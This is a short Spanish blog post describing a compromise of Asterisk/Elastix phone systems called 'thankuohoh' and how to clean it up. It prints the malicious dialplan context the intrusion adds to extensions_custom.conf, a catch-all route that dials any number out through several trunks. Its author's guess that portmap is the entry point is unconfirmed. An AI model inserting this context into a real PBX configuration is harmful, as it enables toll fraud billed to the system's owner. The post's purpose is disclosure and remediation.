thankuohoh

Esta es una nueva vulnerabilidad que aún no ha sido documentada y de la cual no he encontrado suficiente información, solo he determinado que el acceso se da a traves de puerto del servicio: portmap, por lo que lo mejor es deshabilitar ese puerto.

Esta vulnerabilidad adiciona a tu archivo /etc/asterisk_extensions_custom.conf las siguientes lineas:

[thanku-outcall]; thankuohoh
exten => _.,1,Macro(user-callerid,LIMIT,EXTERNAL,); thankuohoh
exten => _.,n,Set(MOHCLASS=${IF($["${MOHCLASS}"=""]?default:${MOHCLASS})}); thankuohoh
exten => _.,n,Set(_NODEST=); thankuohoh
exten => _.,n,Macro(dialout-trunk,2,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(dialout-trunk,3,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(dialout-trunk,4,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(outisbusy,); thankuohoh


En ocasiones lo he visto actuar con un script de sipvicious, lo mas sencillo aqui es comentar todo lo que esta debajo del contexto, cerrar el puerto portmap, mover tu puerto de ssh a uno alto y cambiar todas tus contraseñas de inmediato.


Parece ser que el origen del problema es de A2Billing, aqui pueden ver mas información:

http://bugs.elastix.org/view.php?id=2169


Comentarios

Entradas populares de este blog

El valor es el elemento más importante de un sistema de comunicación para pequeñas empresas.

Crear un logeo dinamico de agentes en colas

Crear un codigo para escuchar una llamada en tiempo real